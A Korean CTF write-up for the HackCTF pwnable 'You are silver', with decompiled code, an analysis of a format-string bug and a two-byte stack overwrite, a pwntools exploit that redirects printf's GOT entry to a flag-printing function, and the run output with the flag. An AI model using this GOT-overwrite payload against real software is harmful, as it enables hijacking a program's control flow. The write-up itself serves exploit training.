[HackCTF / pwnable] You are silver
2019. 10. 19. 07:25ㆍWargame & CTF/HackCTF
Summary
64bit
Analysis
main
/*
 * Decompiled entry point (IDA-style pseudo-C, kept verbatim).
 * Reads a name with fgets(), echoes it back through printf() with the
 * user buffer as the FORMAT argument, then calls printf() a second time
 * with the integer tier returned by get_tier() cast to a pointer.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [rsp+0h] [rbp-30h]   -- only 0x28 (40) bytes separate s from v5 (see offsets below)
int v5; // [rsp+28h] [rbp-8h]
unsigned int v6; // [rsp+2Ch] [rbp-4h]
setvbuf(stdout, 0LL, 2, 0LL);
v6 = 50; // default score; 50 falls into the "silver" branch of get_tier()
puts("Please enter your name");
/* fgets() stores up to 45 bytes plus a NUL at &s, but v5 starts 40 bytes in:
 * bytes 40..43 of the input land on v5 and bytes 44..45 on the low half of
 * v6 (little-endian, amd64) -- a stack-based overflow (CWE-121). */
fgets(&s, 46, stdin);
/* Uncontrolled format string (CWE-134): attacker-controlled bytes are the
 * format; the 46LL argument is not a bound. The safe form is
 * printf("%s", &s) or fputs(&s, stdout). */
printf(&s, 46LL);
v5 = get_tier(v6);
/* Second format-string sink: a small integer (1..4) is passed as the format
 * pointer. NOTE(review): with an intact GOT this dereference would fault;
 * it only has useful semantics if the printf GOT entry has been redirected,
 * which Partial RELRO (see the checksec output below) leaves possible. */
printf((const char *)v5);
return 0;
}
get_tier
/*
 * Map a score to a tier code and print the matching banner.
 *
 *   a1 <= 50          -> 1  "silver"
 *   51 <= a1 <= 65    -> 2  "platinum"
 *   66 <= a1 <= 75    -> 3  "master"
 *   a1 >  75          -> 4  "challenger"
 *
 * Same mapping as the decompiler's nested-if form, written as a ladder of
 * guard clauses. The thresholds are fixed; the caller's v6 (50 unless the
 * stack has been overwritten) selects the branch.
 */
signed __int64 __fastcall get_tier(signed int a1)
{
    if ( a1 <= 50 )
    {
        puts("\nYou are silver.");
        return 1LL;
    }
    if ( a1 <= 65 )
    {
        puts("\nYou are platinum.");
        return 2LL;
    }
    if ( a1 <= 75 )
    {
        puts("\nYou are master.");
        return 3LL;
    }
    puts("\nYou are challenger.");
    return 4LL;
}
play_game
/*
 * Tier gate (decompiled, kept verbatim). main() never calls this function
 * directly -- it passes the tier to printf() instead -- so play_game is
 * only reached if control flow is redirected here.
 *
 * Every branch terminates the process except the a1 == 4 ("challenger")
 * path: it runs system("cat ./flag") and then falls through to the
 * "Who are you? get out!" exit, which matches the output sequence shown
 * in the Flag section of this writeup.
 */
void __fastcall __noreturn play_game(signed int a1)
{
if ( a1 != 2 )
{
if ( a1 > 2 )
{
if ( a1 == 3 )
{
puts("master can't play game. Sorry! :(");
exit(0);
}
if ( a1 == 4 )
{
puts("Challenger. Take this first!");
/* Flag sink: spawns a shell via system(); no exit() follows, so the
 * "Who are you? get out!" message below is printed afterwards. */
system("cat ./flag");
}
}
else if ( a1 == 1 )
{
puts("SILVER can't play game.");
exit(0);
}
puts("Who are you? get out!");
exit(0);
}
puts("platinum can't play game. :(");
exit(0);
}
포맷 스트링 버그가 발생한다.
get_tier에서 숫자를 받아서 printf로 넘긴다.
포맷 스트링 버그로 printf를 play_game으로 바꿔주고, fgets로 46자를 받기 때문에 v6를 2바이트 덮어씌울 수 있다.
2바이트를 덮어씌워서 v6를 75 초과로 만들면 플래그가 뜰 것이다.
Exploit
# Exploit script as published in the writeup (pwntools). It appears to target
# Python 2: str is concatenated with the bytes returned by p64().
from pwn import *
e = ELF("./you_are_silver")
libc = e.libc  # loaded but not referenced below
#p = process("./you_are_silver")
p = remote("ctf.j0n9hyun.xyz", 3022)
p.recvuntil("Please enter your name\n")
# The binary is No PIE with Partial RELRO (see the checksec output in the
# Flag section), so play_game's address and printf's GOT slot are fixed and
# the GOT slot is writable. Full RELRO would have removed this write target.
payload = ""
payload += "%" + str(e.symbols["play_game"]) + "x"
payload += "%8$ln"
payload += "AA"
payload += p64(e.got["printf"])
# Pad to the full 46-byte fgets() length, per the analysis above.
payload += "z"*(46-len(payload))
p.send(payload)
p.recvuntil("You are challenger.")
p.interactive()
Flag
cg10036@cg10036-virtual-machine:~/hackCTF/You_are_silver$ p ex.py
[*] '/home/cg10036/hackCTF/You_are_silver/you_are_silver'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to ctf.j0n9hyun.xyz on port 3022: Done
[*] Switching to interactive mode
Challenger. Take this first!
HackCTF{N0w_Y0u_4re_b4side_0f_F4K3R}
Who are you? get out!